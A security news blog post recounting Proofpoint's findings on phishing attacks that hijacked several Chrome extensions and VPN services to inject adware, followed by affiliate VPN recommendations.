Proofpoint Spills the Details of Recent Chrome Extensions’ Hack

Ali Raza No Comments Blog
googlechrome

Thanks to security experts at Proofpoint, we now have more information about the recent hack that involved 8 Chrome extensions and two Virtual Private Networks (VPNs). The VPNs in question are TouchVPN and Betternet, and it is suspected that their subscribers might have been exposed to malicious popups and data theft at the time of the attack, which took place in June.

Kafeine, a group of researchers within Proofpoint, were the ones that made the discovery. The exploit was quite simple to execute and it involved a phishing scheme that eventually gave the attacker control over several Chrome developers’ accounts. The apps affected are the following:

  • Web Developer
  • Copyfish
  • Chrometana 1.1.3
  • Web Paint 1.2.1
  • Infinity New Tab 3.12.3
  • Social Fixer 20.1.1
  • Betternet VPN
  • TouchVPN

The goal is always money

Just like in most cases of hacking, this one revolved around money being profited from it. Once the attackers were within the extensions, they injected code that added unwanted Javascript, which loaded adverts on top of web pages and created a revenue stream.

The researchers say that the code they’ve uncovered for the advert substitutions were mostly targeted at adult websites, but they do not throw away the possibility that other sites had these adverts as substitutions, too.

But it seems that there was another aspect of the hackers’ attack – many people got a javascript prompt that told them they need to repair their PC. People would click on the alert that looked legitimate and got redirected to affiliate program services which made a profit for hackers.

It is also possible that consumers suffered data loss due to the penetration.

Simple yet effective attack

The hackers used a simple phishing technique, the researchers say, which involved redirecting the app developers to a fake Google account login page. Once the developers typed in their login details, the attackers got the hold of the details and were able to make changes on the developers’ app from the inside.

According to a post on Kafeine’s blog, this happened at the end of July and beginning of August. Several developers’ account credentials were stolen, resulting in their extensions being compromised and therefore their users being exposed to malicious popups and credential theft.

The news about the hack got around on 12 August when one of the developers whose Google account and Chrome extension got compromised announced the news via Twitter. The developer was Chris Pederick, the maker of a popular extension Web Developer for Chrome.

Next step for the Proofpoint researchers was to download the compromised version of the extension (0.4.9 version) and get the malicious code the attacker put there out of it. The way the compromised version worked was that once installed, the extension would wait 10 minutes before contacting a remote Command and Control server via HTTPS.

Then, more malicious code would be inserted into the extension from the server. These domains were found on CloudFlare, and have been taken down as soon as Proofpoint flagged them.

Betternet

Users of Betternet, who get served with adverts regularly by their VPN of choice, the hack resulted in the ads they’ve been shown being from the attackers. According to one user, on the morning of 25 June, the adverts were all over Chrome. This is how it was discovered that the hack also involved VPNs.

Others Betternet users also reported having their Chrome swamped with unusual adverts, which in turn helped Betternet connect the problem to the Chrome extension. Betternet has been contacted for a comment and they confirmed that they had indeed suffered the ill-publicized hack. They have stated that they identified and fixed this issue the same day it occurred, on June 25.

Don’t use VPNs that serve you adverts

This kind of incidents only shows you more reasons why you should rely on free VPNs with dodgy privacy policies. The very purpose of VPNs is to protect the privacy of their users, by concealing their location and encrypting web traffic.

Free VPNs like HotSpot Shield, Betternet, TouchVPN, and many others have stated in their privacy policies that they collect data from their users so they can target ads better. But this isn’t something a VPN should do, instead, it’s the exact opposite.

Unfortunately, many VPNs in the industry have these poor practices and care more about the profit they are making than about their customers’ privacy.

Here are some good pain VPNs:

Proofpoint Spills the Details of Recent Chrome Extensions’ Hack Proofpoint Spills the Details of Recent Chrome Extensions’ Hack
Multi-platform Compatible
256-AES Encryption
PRICE $5 for 1 month with code "best10VPN" $6.95 a month
Website Rating 9.9 8.8
24/7 Live Chat
Residential / Dedicated IP for permanent streaming access
Has Mobile App + PC / Mac Support
Stealth VPN / Advanced Obfuscation techniques
Visit VPN Provider Visit TorGuard Visit PIA
Ali Raza
Passion for Cyber Security and Technology.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*

Lost Password

Sign Up